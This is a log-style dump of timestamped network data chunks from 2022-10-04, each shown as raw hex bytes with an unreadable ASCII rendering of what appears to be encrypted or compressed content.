                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3639INData Raw: 73 89 6d 4d 55 34 b0 c4 cf 7c cd 49 89 4d ae fb 80 73 a7 28 79 c0 8b ce 87 c3 74 af 1f 47 43 f8 76 2e 4f 45 fc 65 25 e2 20 5a 94 31 b2 d5 09 a4 41 14 3a d5 fa 75 ff 6c 2a f0 36 15 7c 59 42 67 aa 5e 76 75 d6 37 b5 3d 3c d4 84 dc e0 1f b0 4f 6c cb c8 08 96 a2 62 6b e6 93 8f 3a f3 c0 be ad 72 e6 ae 49 16 20 1d b0 f7 17 85 d5 1c 0f 82 f1 04 21 21 d4 c1 ab 8a 27 ee fd 46 ec 99 02 a0 fe 4c 2c 32 28 35 36 12 eb 09 df c4 eb ce de 8e c3 c7 51 ab f0 bf 4b b1 ba d1 9a ff 5b 00 b7 bb 00 6e 81 4b 40 6b 29 b8 39 a1 58 a6 40 4d cd f9 16 07 f0 ce d3 9e 12 be 0e fe 32 6e a1 42 31 1d 7b 82 88 96 7b df 11 2b 7e ab 91 67 60 eb 74 0e e4 df 20 8f 6a f8 2b f9 2d 13 e2 9b dc 25 8f fb fb b9 ba a0 9a e9 08 36 bd b4 e0 ac 53 0a 61 5e 30 eb c8 87 7b 4e 27 c8 87 5b e2 c9 c4 5d bd ca
                                                                                                                                                                                                                                    Data Ascii: smMU4|IMs(ytGCv.OEe% Z1A:ul*6|YBg^vu7=<Olbk:rI !!'FL,2(56QK[nK@k)9X@M2nB1{{+~g`t j+-%6Sa^0{N'[]
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3655INData Raw: de 34 10 07 95 f3 24 34 a6 22 90 be 0a bb b1 de 68 5f be 6a 40 f3 cb cc ec f2 b4 76 9a 05 1e 30 61 5c c6 f4 d4 c2 2d af 79 5e f8 62 3c 4e 43 ff 2a 6f 7b 69 d6 08 d8 40 2e c9 05 3d c9 eb b1 f9 4f ba 89 5a 49 46 cd 1e 1b f4 cd 9a 4f cf 57 d5 63 32 8f 48 88 1e b1 cc 5e b1 55 d9 af 0b a6 c6 c6 b4 cd 73 ac ca cf 7c 92 fa 5a d7 43 8e 40 b2 74 dd 10 33 c3 85 df 5f 25 09 2a 52 5a c6 fa 30 d1 ab 1a 00 bf f9 b2 d4 55 dc 35 60 1b f2 66 74 3d d1 b6 ec c7 97 3f 63 a7 68 55 e1 bb 83 0a 1d 6b 36 0d 4d 0b 6a 35 d5 c6 ea 3b 50 74 27 77 c6 db fa 81 48 c6 53 ea 4c 51 30 a8 46 9a b2 a6 a9 32 66 4d e2 43 c2 0f 84 06 ff be 40 99 ac df 80 46 b2 74 5b 0a 5b f2 d4 fd a2 bd df e2 00 96 c0 64 b2 12 f9 6c 33 90 bf 05 bc 13 7b c0 39 2b 98 b6 9e 61 f8 93 8f fa 1e a3 4f 36 6e 23 1d 64
                                                                                                                                                                                                                                    Data Ascii: 4$4"h_j@v0a\-y^b<NC*o{i@.=OZIFOWc2H^Us|ZC@t3_%*RZ0U5`ft=?chUk6Mj5;Pt'wHSLQ0F2fMC@Ft[[dl3{9+aO6n#d
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3671INData Raw: 79 c2 4c f2 e1 af 41 e9 d0 ef 73 46 b7 6c 38 52 43 59 3b 61 5f e4 15 e1 01 2e c6 a4 3d 48 c9 2c 26 f1 a5 2e ff 2e 55 23 9e 59 63 28 8a 00 3e 5d 3e 9f e6 c2 4e fb b5 9f e0 4b fb 3d 1b 8f 98 54 ff 62 c7 e4 a3 7a 4f 5a 29 57 71 b4 d8 48 41 fb c6 3b 4a eb 3e d5 6f 7c db 8b a0 79 07 3f 63 11 8b 60 de e3 08 97 55 90 0b fe 9f a0 a0 3c 30 33 a1 a3 75 10 63 97 77 19 6d a0 1a 87 0a 20 8d ff 9c 84 4f d6 38 49 b5 a9 04 35 b5 96 5f 3e da 46 b8 a1 75 5b 00 1c 5d b9 d5 8e 13 da b1 62 fa d0 5c eb 20 d4 d3 e1 50 e7 24 00 a3 e3 10 2b b3 10 22 79 20 c0 73 68 00 75 9d d1 04 89 5c f4 8b 56 ab b7 f6 56 91 dd e8 59 a1 9d c0 01 e3 c1 b6 d1 ef 94 1d 6f 31 86 28 e8 71 1d c4 13 df aa b5 dd ea 7a aa c9 45 4c 81 67 7a d6 bd 88 af 51 16 af 15 65 2c 6d 5f 30 b5 cc e6 7b ef 66 c4 43 eb
                                                                                                                                                                                                                                    Data Ascii: yLAsFl8RCY;a_.=H,&..U#Yc(>]>NK=TbzOZ)WqHA;J>o|y?c`U<03ucwm O8I5_>Fu[]b\ P$+"y shu\VVYo1(qzELgzQe,m_0{fC
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3687INData Raw: 13 0c 6c ba 25 aa ae d3 fe 4f 63 0e 84 a9 54 04 c5 b1 ab 34 bb 4b d3 85 e7 a6 da ab 4e 98 74 eb cf 17 73 08 ae 2a 99 c2 6b b8 be 70 a6 71 4b 41 7c 59 de 66 26 74 f3 58 4e 0a 54 c6 be dc 31 f5 81 f3 c8 00 eb d9 0e b4 57 e8 af d7 37 c9 39 b5 7a 0f 04 17 38 3e 4e 23 1d d4 31 e2 63 90 31 57 17 15 9f a6 8d 0f b2 60 96 53 8d 2d 0e a4 06 76 62 ca 04 dd 06 c0 bc 26 78 5c 10 97 04 fa c1 d1 75 c3 4e 21 34 a1 25 be 2f 61 66 0b ce 23 3e 8a 57 13 54 7e 78 02 ff 2b 16 cb 08 f0 2f ea 86 4b a4 68 2e e8 11 4e 22 0c f5 b5 3f a6 14 07 21 d3 66 d9 c6 e3 a0 bc de 84 e4 7c e9 e9 cb c1 53 76 82 2f 07 5d 85 4f f1 5e 68 7c f7 a5 e9 5b 6b c2 02 33 2d b0 fd 0c 67 93 d7 e5 f4 58 65 92 44 89 a2 3e 9f 01 7c 32 7b 3d 6b 9d 92 15 01 cd 16 08 95 20 24 0b bb 5d 81 f3 51 78 00 64 d4 1a 2e
                                                                                                                                                                                                                                    Data Ascii: l%OcT4KNts*kpqKA|Yf&tXNT1W79z8>N#1c1W`S-vb&x\uN!4%/af#>WT~x+/Kh.N"?!f|Sv/]O^h|[k3-gXeD>|2{=k $]Qxd.
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3703INData Raw: 5b 03 96 bf 19 43 f1 fb 1b 92 02 22 7e 04 5d 75 47 df 71 17 6c 88 e5 f4 d0 a2 b9 54 89 0a fc 96 0f 37 0a 10 ec c5 52 2b dc a9 c0 e9 d0 ab bc 5e 48 b4 f7 bb 49 97 37 b4 8e 25 8a f5 89 03 6e d1 56 67 9f a6 e2 d1 83 18 db 9c 17 8e 52 dc 87 70 ea 26 82 3f 27 68 a2 22 35 25 b0 29 55 93 14 21 90 02 a8 e2 b8 4a ca 4e c1 81 3d 4b cb 8d bd 34 c6 0b 81 f1 92 65 27 55 cd 46 7d 82 a4 2a 54 dd 0d f7 ba 56 01 69 49 c7 d8 04 39 f2 57 32 45 ac 38 73 ec fa 48 91 c8 f3 25 8d e7 d6 98 bb dc d9 71 fe 34 53 f1 71 d6 31 c1 50 a1 1d 83 a9 87 b5 a2 4c 9e f9 fc 15 db 92 2a 3a d3 ad c4 12 2b 9b df 17 ba ba f1 1c e7 59 6d 24 22 bd 6e ae 0d a7 9e a7 0e 22 4b cd 0e 32 ff fe 39 51 0a d2 99 00 5d e1 03 37 5d 8f 1c 61 dd 10 e9 d9 a2 2e 80 ee 9c 08 10 4d c8 e2 a2 e8 92 44 75 2f d0 d3 55
                                                                                                                                                                                                                                    Data Ascii: [C"~]uGqlT7R+^HI7%nVgRp&?'h"5%)U!JN=K4e'UF}*TViI9W2E8sH%q4Sq1PL*:+Ym$"n"K29Q]7]a.MDu/U
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3719INData Raw: cc 09 a1 12 d1 c8 d4 11 a6 19 b7 0e 07 73 2c 81 81 9f d6 7e 62 07 fa 55 01 6e 13 34 12 ce 2d f8 ba 3c 5f fe f9 6a 5d 41 0d 41 a5 75 12 96 20 38 86 46 52 df a1 63 75 bb 4c 54 a8 c1 c9 71 0c 3d 3d ea f6 6b fa 1f 75 82 b4 de 1b a5 4d db 7e 66 43 29 ea fd a8 c4 2b 24 75 cd b0 cf bf 03 55 5b a0 1e bf 07 81 88 aa 96 23 f3 cc 83 bb 46 98 82 e5 62 6b 54 65 64 5a 69 88 5a e9 27 87 4c 87 79 b8 06 47 43 ef e4 4e 28 88 b5 73 00 5c f0 a8 22 18 da a5 33 20 f3 6b 36 fe e0 12 bf be bf 02 fd d9 28 4e 4e a7 98 15 5e e5 6a 70 59 06 1b 75 af 4d f6 ae 42 88 4d e0 53 d9 59 4d 66 59 be 0e 01 71 e2 ae 00 86 79 b4 8d dc 98 24 76 df f7 f1 e9 ec 54 eb dd f3 ce d7 49 15 0d 3a b1 c1 95 58 80 e0 8b 4c 4a 79 19 b2 fd 69 56 5a c8 0b f0 fd ed 91 cc a1 c7 11 be da 4a 3a 82 d6 6b c2 dc f4
                                                                                                                                                                                                                                    Data Ascii: s,~bUn4-<_j]AAu 8FRcuLTq==kuM~fC)+$uU[#FbkTedZiZ'LyGCN(s\"3 k6(NN^jpYuMBMSYMfYqy$vTI:XLJyiVZJ:k
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3735INData Raw: e4 bf 8e b2 94 40 eb 18 03 55 90 5c 56 fc 39 23 1c e6 4c 3a e0 12 7d 79 aa 47 8d 41 3d a2 33 0b 62 48 e3 07 7d 07 76 7c e1 de f9 30 fb 67 5d 38 91 f2 61 15 6a 23 66 b3 1e 75 af e5 a4 ec ef 4a 8f 9c cb 27 ef 92 65 14 09 54 59 4a 1b f7 b0 39 e3 32 18 8f 00 28 a3 e9 ed ad a8 32 4a 83 7e 2d 61 65 90 f6 2b 9d 07 ff 66 56 87 c6 b6 fc 9f 62 bd 43 38 bb 9f b4 c8 44 0b 8f e0 d8 f6 12 48 26 29 46 dd 57 45 e6 af e7 de bc 77 14 35 3b 0e ef e3 28 be 87 3e 8b 1e 02 7c 0d d7 2c f7 65 1d 82 02 2a 56 3a bd 89 0f a4 42 90 db 05 36 7a fe e1 5a 9f 1f 10 10 40 36 0d 58 5f 6c 05 55 a9 27 a5 2d d7 72 db 46 51 2f 1c 78 e8 ca 8e 36 91 17 35 dc 3a 5c 8e d1 47 c2 07 03 00 bc 44 ba bc 1f 59 18 fd 73 74 39 11 d8 d4 65 cd 12 a7 e3 5e 76 a1 5b a3 9c 39 31 82 0a 9b f2 1e a8 61 b4 7b b7
                                                                                                                                                                                                                                    Data Ascii: @U\V9#L:}yGA=3bH}v|0g]8aj#fuJ'eTYJ92(2J~-ae+fVbC8DH&)FWEw5;(>|,e*V:B6zZ@6X_lU'-rFQ/x65:\GDYst9e^v[91a{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3751INData Raw: de 2c 42 21 09 de c7 6d ad ab c8 5e 1e b8 08 3d 57 8d 2e eb 91 f3 51 3a 18 5c 07 65 32 04 36 eb a4 fe 3b 3f f8 08 d4 fa 59 d0 2b 09 84 18 47 c4 41 13 5c 60 1d 89 f6 ee d1 ea d0 a5 50 62 dc 91 5c 74 66 cc e2 a3 aa 48 57 d6 d4 74 08 66 36 7f 13 54 0e 88 11 6e 12 a5 13 ed 5d 61 8a 40 3d c2 6c 41 4e e5 79 b1 d5 1f 77 69 ba d0 28 70 98 4a f9 b5 0b ea 4b 53 0f 48 9e 51 2d fb 9f 04 75 39 6e b8 fb 07 82 a6 0f 8b b4 00 e7 99 20 c2 0e a1 28 98 0c f0 6c 16 e9 a3 59 6f ac 4a 27 cd e0 8c 34 9d 3a e2 0c 79 33 2f e2 43 01 11 ba 38 f5 5d 01 60 cf 78 03 ae 54 b5 88 1c cf ef bd 93 4a bb c3 09 3c ae 6e 33 28 32 11 32 d5 59 63 a3 44 dc ef 64 7c a4 c0 0b 58 ea 44 15 50 af e0 67 ce e4 67 7e a9 58 79 8d 49 69 15 dd c6 76 4c 8c 4c 71 52 f1 18 ef 72 31 77 7c 74 83 a2 6c 9e 26 54
                                                                                                                                                                                                                                    Data Ascii: ,B!m^=W.Q:\e26;?Y+GA\`Pb\tfHWtf6Tn]a@=lANywi(pJKSHQ-u9n (lYoJ'4:y3/C8]`xTJ<n3(22YcDd|XDPgg~XyIivLLqRr1w|tl&T
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3767INData Raw: 7c 0e 5c 30 f6 a9 ea d5 0a a3 81 fe 4c da 56 bd 5b 96 ab 71 1a d3 56 39 4b 6e dd 15 cb 5b a6 1c 85 a5 98 7f 9a a7 ba e1 59 6e 15 74 16 54 96 17 e6 4f 07 11 a1 ad ba c8 d1 18 be bd 18 74 62 f9 21 7c 2e f4 b8 c3 9e 9e ae f6 46 33 61 92 cb 72 6c 50 aa 24 5c 16 5f 64 ee 8f e8 c0 61 2f 20 dc 24 e2 79 83 91 ae 0f 58 4d f6 65 58 06 2c 01 15 57 29 f1 26 9b a9 ed 98 97 51 12 f0 1e 46 46 3e a7 b7 b3 1e ae d9 c0 e6 0a 10 14 7e f3 de c6 9e e1 4b db f6 59 9a a1 24 8e db 40 5b 86 24 d3 fb 4b 52 d6 da 39 09 c3 7a 0b 5e 34 8a cb 1b e1 74 a2 da 28 7a f9 f8 dd a6 96 c9 52 d0 f7 d0 ce 81 ae 42 4f 36 0d ed 40 e4 6d 24 96 6a 09 22 24 5f ca cb 4d f8 f8 81 87 c1 d2 c7 1c f3 2b 2a 03 d5 e2 28 6b 38 b7 b4 6c e3 7f f6 9d 98 59 cb 78 d7 c5 bd ea 77 32 cf 38 cb 6d 90 b9 2b c5 4a 37
                                                                                                                                                                                                                                    Data Ascii: |\0LV[qV9Kn[YntTOtb!|.F3arlP$\_da/ $yXMeX,W)&QFF>~KY$@[$KR9z^4t(zRBO6@m$j"$_M+*(k8lYxw28m+J7
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3783INData Raw: ef c0 cd cf 2e e2 27 a4 f0 bb c8 1d a2 a7 1e 56 e2 07 68 b5 ab eb d6 c5 61 ab 7e 9f 3e 9e 33 d7 be 6c bb 70 3d ee 0d 29 55 fb d8 84 a8 12 72 22 d0 94 f4 a8 e0 a8 89 a3 11 47 93 eb c4 73 cd 6f 61 ef 6a a9 e6 f1 62 38 f8 d6 fe 02 5a 04 d1 b9 25 9a 9b a6 3a 0b 7d ec dc db ee b4 f8 60 50 77 30 b3 d7 51 26 f5 7c 3f 57 11 d1 ee c1 26 da 3a 42 f2 17 61 67 61 30 9a f2 39 07 3d 51 88 4e 31 58 67 7d d9 be 32 80 51 24 2e cd de 44 e2 e5 41 02 25 db 3c 8b 29 bc cd 40 53 85 1c 90 61 0c b5 56 6d 04 d3 aa 67 b7 9b ef 32 2e 2b f4 cb 53 7f ad 5d 47 d1 12 69 5a ed 79 11 e1 66 1c c9 20 f8 c1 a6 a6 45 d6 96 72 0f c3 1c 5a c8 e0 2e 83 76 81 c4 c7 90 10 76 d0 b6 89 d7 90 4c 78 59 fb 5f 4a c4 a0 7d 7f b8 3f 3b 95 73 40 ce 52 8e a5 f8 40 94 3c 9e 00 34 a2 43 a8 b9 01 00 b0 85 7b
                                                                                                                                                                                                                                    Data Ascii: .'Vha~>3lp=)Ur"Gsoajb8Z%:}`Pw0Q&|?W&:Baga09=QN1Xg}2Q$.DA%<)@SaVmg2.+S]GiZyf ErZ.vvLxY_J}?;s@R@<4C{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3799INData Raw: 8f d7 b1 35 db 95 ba e1 d8 b5 f5 0f 8a 11 40 4d 4c d0 d1 32 32 3c 6b 91 25 4c bc c5 b2 83 41 95 f1 3b ea c2 12 31 f5 8b 80 36 3f ad 9d e5 98 3e 34 97 6f 8e d5 d5 b9 b4 d0 7b 53 2c 7a 6a e9 b3 55 df af fe 03 b3 ed 41 f1 7a ed ff 35 c5 07 ce 79 56 41 03 88 b4 7b ad 84 fb f2 87 fc 37 5f c4 ba b0 00 34 51 41 2a 73 e6 34 49 ae fb f5 6f fd a2 a7 46 3b d7 34 8e b1 e8 a7 83 4d b7 91 6c 0f 30 26 2d 1b 3a c4 94 2e d4 2f ab 82 64 5a f7 20 3b 99 df 04 98 22 ed a6 45 77 37 ae 67 59 f7 3f 6c 15 64 0b e1 dc a7 d3 de 4d 50 17 51 41 3a 0f b5 00 0c b2 d3 16 4b 98 71 50 c2 ee d0 c5 1b 89 14 59 4d 38 d8 66 2c cd ad 42 a1 e3 a9 45 9b 64 74 c1 5a 3c 42 c8 35 b5 1c 4d 8e a8 26 34 72 28 7c 49 5f 98 4c f8 60 1a 4c 91 16 f7 7d 07 6d c6 1d c9 1b 07 55 17 55 fa e7 e4 d4 90 d8 ee 90
                                                                                                                                                                                                                                    Data Ascii: 5@ML22<k%LA;16?>4o{S,zjUAz5yVA{7_4QA*s4IoF;4Ml0&-:./dZ ;"Ew7gY?ldMPQA:KqPYM8f,BEdtZ<B5M&4r(|I_L`L}mUU
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3815INData Raw: 50 86 eb f8 b1 ce 01 95 8f a1 82 e3 c2 3b a6 73 ed 3d 74 f9 09 27 c9 af 4f 4e 8c f9 97 a4 dc f1 e0 56 26 9e 39 2d 78 73 7a 81 4d 53 a0 60 83 2b a0 56 99 fd 02 b5 ae 75 52 28 85 2c 31 6d e3 5b 32 96 5a 62 9d af fa 21 bc 7b 8d 38 3d e7 20 4e 10 2a 5f 40 2e 1a bb 0b 93 7a 42 d8 ca 21 ea dd 49 09 ee d4 4e 7d f8 7b 7c d1 ae d3 9f 7b 05 2b 9b 21 88 85 c9 a2 f2 21 4d 18 a6 14 db 24 00 54 47 f3 7d 9e cd b4 cf 23 0c 07 bc df 1e 09 30 d4 fb 47 7c 09 d9 dc 31 39 a0 13 89 f6 02 4b f0 42 ea b0 65 88 fa f9 c9 ae 2d 0f 12 15 d4 27 68 7b 7c cd b0 56 77 45 59 83 1d a5 80 16 c9 f4 64 22 e0 a3 37 e3 20 a5 05 92 aa 41 c1 2b b5 fe d6 e5 4b 41 c4 c0 5b e2 91 ab eb 6a fb d9 0c 10 19 3f 06 6c fb 07 24 49 57 8c 77 a1 14 e5 4e a1 8e da 9c 32 c8 6f fc a8 b1 ae 3b f4 34 5a f4 07 b4
                                                                                                                                                                                                                                    Data Ascii: P;s=t'ONV&9-xszMS`+VuR(,1m[2Zb!{8= N*_@.zB!IN}{|{+!!M$TG}#0G|19KBe-'h{|VwEYd"7 A+KA[j?l$IWwN2o;4Z
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3831INData Raw: de c0 ff 40 dd 93 ce ea ab e9 f6 38 d6 a7 98 06 2f 38 d6 a6 95 60 a0 e6 86 a7 8f f5 87 56 88 ea c4 25 14 e5 4e 15 5a 33 18 93 38 0e 02 0d 98 eb c2 7d 4c f0 06 75 dc 9e a3 12 7c 91 43 60 f3 86 f6 70 6e ba 6b ff bf 94 91 45 93 19 c5 5e 3a 6b e0 a3 f4 67 35 04 14 68 50 fb 58 ac 2d 3f 26 af dd 40 3d 6c 38 23 ed 76 b3 70 b3 33 29 1a fc 1f 67 83 34 f8 3b 08 eb 46 46 79 3d 00 f2 20 19 f7 35 40 ac 33 99 a1 a8 eb 96 44 54 9d fa 43 62 b2 9e 87 89 21 76 96 3f 56 08 89 a7 cd ca 06 db 08 7e d0 83 79 6b 92 ff 1f f1 51 4a 93 60 12 31 d2 08 a2 eb f8 7c f0 f2 fa e0 57 9a 5f 74 2e ff 76 42 55 e9 a0 81 26 1b 8d 27 37 bc 0d 67 9e f2 87 69 56 f0 62 79 42 c5 9e d5 00 bb 16 af 88 60 76 3e b1 2a ca 32 15 4e b7 93 23 2f fc bf df 2b 8c 24 c7 cc 82 ac 69 c2 21 aa fe 7f 72 6f 22 11
                                                                                                                                                                                                                                    Data Ascii: @8/8`V%NZ38}Lu|C`pnkE^:kg5hPX-?&@=l8#vp3)g4;FFy= 5@3DTCb!v?V~ykQJ`1|W_t.vBU&'7giVbyB`v>*2N#/+$i!ro"
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3847INData Raw: 31 70 ec 05 21 e9 56 02 fa 73 b3 a2 41 be f3 d2 c3 83 93 f3 55 44 91 26 bf 18 59 c4 fe 89 53 d6 5f 57 32 b7 00 f8 f9 b1 8a e7 95 61 d3 04 2b 4c 54 e9 87 b4 7b 40 c8 9d 30 c0 4a d1 7b 06 1b b3 8f 59 a3 f1 f8 a3 0e 87 a8 52 93 99 ed e1 aa 5e 05 8a 25 ef b7 67 40 0b 4e f6 23 59 9f f3 39 98 6b 4c f3 57 e1 6b 75 88 77 b8 73 6f 80 d7 29 ed 08 9d 17 da 56 49 03 37 80 81 66 13 26 5e be 4e 31 45 d7 de 7a 0f f5 f3 a3 6f 72 18 19 e1 b3 90 c6 3d 86 46 b2 91 46 1e 67 60 0b cb ae aa ee 66 c2 30 6a c1 9d 59 d0 c6 4f 6c 16 37 b4 80 0e 55 89 06 ce 42 82 aa 19 53 af 12 2a c3 7a 8a be bb 6b f6 0e be 3c fd 4f 7f b2 04 2e d6 05 da bf 44 68 62 d8 67 d7 50 ce d4 ca 43 35 9a d9 6d 4b e8 42 26 40 5a b3 25 ff 5a e3 c9 32 24 b5 fc 99 74 0a 76 71 a5 a9 00 42 4c bf 0c 5d 34 63 58 36
                                                                                                                                                                                                                                    Data Ascii: 1p!VsAUD&YS_W2a+LT{@0J{YR^%g@N#Y9kLWkuwso)VI7f&^N1Ezor=FFg`f0jYOl7UBS*zk<O.DhbgPC5mKB&@Z%Z2$tvqBL]4cX6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3863INData Raw: 99 2c 60 ed 29 01 96 06 71 06 c7 6b 26 3c 9a 89 81 88 f1 56 70 33 71 c0 eb 0d d9 8f 93 4f ba b0 37 43 05 f1 4b ea f0 53 4a cd 39 53 a7 1c 4b dc c2 44 c3 25 25 d9 78 cc 4a bd b9 1e fc 8e 6d 55 dd f9 85 20 57 87 c5 12 0f 86 a0 93 04 fc 8a 18 2b a3 6c 19 85 0d f0 2d ea 57 c7 d0 89 88 19 1d 0a 96 1a d3 89 a9 b0 f4 8e d8 50 4b 02 ee d4 87 63 77 fc e5 e3 ce 7a af 67 a0 22 e7 23 78 51 d3 4b e9 28 26 8d d1 55 05 53 cd 9d 72 1c c6 eb f1 95 11 65 28 25 08 d3 76 da aa e6 1d 19 ff 6d eb 57 09 82 74 2e 8d 1a cf f9 5c 77 4a ab 87 c2 91 66 c9 dd 2f 2b 1b 02 dc d1 27 36 8d b0 81 2d ed 11 67 d8 c1 c7 7b 5e a0 5b da dd c0 4a 93 ef c9 5a 8f 5b 57 b3 38 c6 de a6 6c f0 8f c2 eb 89 ff 83 41 e9 88 eb 57 be 13 9b 01 c6 61 a8 7d 05 c9 62 fc b7 bc 94 7a cf 5e c9 d1 b8 d8 df 51 a3
                                                                                                                                                                                                                                    Data Ascii: ,`)qk&<Vp3qO7CKSJ9SKD%%xJmU W+l-WPKcwzg"#xQK(&USre(%vmWt.\wJf/+'6-g{^[JZ[W8lAWa}bz^Q
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3879INData Raw: 1f 9f 2e a6 a6 53 0a 50 5a aa 6e 29 41 75 27 cd db 11 f5 1d 6c df f2 6f e6 66 f6 30 0b 15 b3 ed 0b f3 be 45 54 57 e1 4a 18 14 fc 55 87 dc 14 ad 03 40 ef 3b 18 83 82 78 f7 3c 5c ea 4e f5 10 f8 d7 3e 8f 52 30 41 7a d2 bb 67 e1 82 87 16 89 31 99 b7 10 68 a7 56 ba 1c 66 5c 6c eb f8 c6 12 55 aa 8e b8 af 49 18 6a bc d4 f0 5f 74 3e 3c ff 0f 3a b6 24 6e 48 74 cf 04 91 2b ec 56 35 a2 5d 74 98 74 15 13 99 16 45 3d 74 40 17 50 11 16 f4 26 94 50 fd a9 cb 64 73 ef f7 3d c1 e8 ea 93 c5 21 62 93 5c 0e 09 3b 20 3e ef e4 94 ef 2f 93 37 8c 8d b0 9b 5d dc d6 99 4c f3 a7 6a e6 be 53 25 da 99 46 59 ff 89 e2 71 a5 f1 03 d0 b8 70 9f 3a 89 f1 39 29 f4 a8 fe 39 9d 5c cd 05 f1 31 45 04 e3 9c 35 1b f5 e6 3c 21 4c d9 8a 88 64 d4 21 0e 5f 2f 21 1d 58 9b 2a 41 d5 45 bf 3e 22 90 eb 4e
                                                                                                                                                                                                                                    Data Ascii: .SPZn)Au'lof0ETWJU@;x<\N>R0Azg1hVf\lUIj_t><:$nHt+V5]ttE=t@P&Pds=!b\; >/7]LjS%FYqp:9)9\1E5<!Ld!_/!X*AE>"N
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3895INData Raw: 86 58 2d 3c 07 fd 9a ab 88 f4 f0 2b 76 dd 90 84 b5 cc bf 7b 54 9f 66 0a 26 4f 07 b1 a6 64 f8 9b 78 ff a6 81 7b 92 a9 a8 9c 06 64 2d 99 aa 02 6b 45 a3 2a b9 a0 3f 3c 37 2a a4 17 4f 5b 87 8a 3d 7e b2 3f 39 3b e3 e6 80 25 6b c6 f9 7f bf 81 12 08 c0 af af 47 93 96 3e 2d 05 c2 02 ff 8b 41 05 49 b9 84 71 57 d8 fa 20 31 0b 78 3d d7 05 3d 6d 94 8b 1a af a2 8d 2d 21 07 e6 b3 40 07 a7 67 8c 02 c6 38 1b 3e 85 e5 9a 5b 3c 5b d0 46 e3 a4 89 d4 70 cf c9 85 a8 5a ba 22 ae 07 15 a0 34 bf fb a3 a4 3d 7f 79 e8 f3 62 6e 9b 30 21 26 64 18 d8 44 98 07 39 10 3d e5 30 c2 f3 12 2a 92 de 26 3b d1 58 e9 79 e3 47 81 68 89 46 6e 94 75 24 f0 dd 53 42 ea cd 67 86 d6 b1 8f 5c b0 3d b1 25 bc a2 82 0c f6 f6 c6 51 6f 83 d8 4d bd 69 ba cd ce 9c 8b b5 3f 11 d0 0d 23 a7 a1 64 89 2f cf 22 b4
                                                                                                                                                                                                                                    Data Ascii: X-<+v{Tf&Odx{d-kE*?<7*O[=~?9;%kG>-AIqW 1x==m-!@g8>[<[FpZ"4=ybn0!&dD9=0*&;XyGhFnu$SBg\=%QoMi?#d/"
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3911INData Raw: 1d 4c 84 42 51 81 bc 78 0d 5f 02 2c 3f 4a c7 65 97 91 e5 48 3e 34 e5 8e 01 c1 d4 89 a2 07 8d 80 03 c3 3f f5 ec b6 2c 11 51 ab ed a2 aa 94 28 9e b8 aa 1b 85 6f eb 47 00 6e 49 6e d5 b7 71 19 46 01 a7 d7 1d 2f 63 1c 39 e6 e3 fd f1 eb 4e 42 aa 8b ec 2e 50 98 4d a1 b6 09 3e 6b 77 f8 3d db 44 37 f9 01 cb 58 8e 46 b7 99 4c 89 b1 d0 2b 68 07 d1 68 13 28 6e 25 4a bc 90 43 c4 ee d6 dc ad 77 a2 bb 37 32 0e b4 e4 12 e7 7f 6f 39 e4 84 be 5c 05 c5 e5 6b 8d f9 ab 91 46 9b 18 0c 3b 8d f1 ec 6e cd 96 7c bc b6 ec a1 c7 ae 72 8a 08 78 32 65 22 7b 61 aa 46 84 c1 6e 17 84 ff f4 bb 28 9a 6a dd 95 eb 26 6c b2 c4 07 06 45 eb 92 85 6e 26 2d fa 80 89 66 a7 0a b4 ed 94 24 40 03 86 97 02 7a 3e 47 7c f7 b0 ac d7 c9 97 ec 0d 6c 88 ad 01 9d f0 05 b7 9d 1b 1f 48 cf 04 d6 bb c5 93 fe 02
                                                                                                                                                                                                                                    Data Ascii: LBQx_,?JeH>4?,Q(oGnInqF/c9NB.PM>kw=D7XFL+hh(n%JCw72o9\kF;n|rx2e"{aFn(j&lEn&-f$@z>G|lH
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC3927INData Raw: 3d 8f 8f 89 58 04 72 d9 38 48 0b e6 73 f0 d7 e3 3f 13 e6 0a 88 97 b8 b6 cf 68 57 bb 74 55 d1 84 ee 4c b4 7c e1 c7 8c ea 78 8b 18 3f a5 e4 90 ad 1a 38 a9 9e f1 6d 94 61 08 4b 6c a5 5e b6 9a 48 91 4f 2f 0c 3a 0f 1b 24 c0 84 be 9f 1a 03 23 37 c7 37 2d 93 24 de db 7f 16 34 79 cb cc d6 50 45 cc b1 2d 25 e4 22 e6 e2 7d 56 bc a5 f7 62 10 31 6f 46 9b 15 c1 44 25 c6 db da 50 12 9e bd 46 47 fb a9 a4 fb 9e d3 12 8c 92 64 ca 29 db 35 2f 04 3c 2d df f4 99 ad bb 69 58 74 aa 6f b9 18 a4 4a 44 af 00 65 85 c8 73 03 d3 04 2e 7f 02 99 60 76 b0 d9 83 54 88 0e c1 c1 7f 0b 61 eb ce f5 02 15 a3 f8 fd d1 7d 2d 95 20 2d ed fc fc 99 46 f9 5d ae 40 d9 a6 8b 54 1f ec 36 1b 61 a1 c4 30 bf bb 96 ee 3a 5c d1 7d 7b 5b 5f 27 72 bd d2 c3 12 cd 25 de 52 9f fe b5 8d 04 c9 bf 90 4e ae c9 c5
                                                                                                                                                                                                                                    Data Ascii: =Xr8Hs?hWtUL|x?8maKl^HO/:$#77-$4yPE-%"}Vb1oFD%PFGd)5/<-iXtoJDes.`vTa}- -F]@T6a0:\}{[_'r%RN
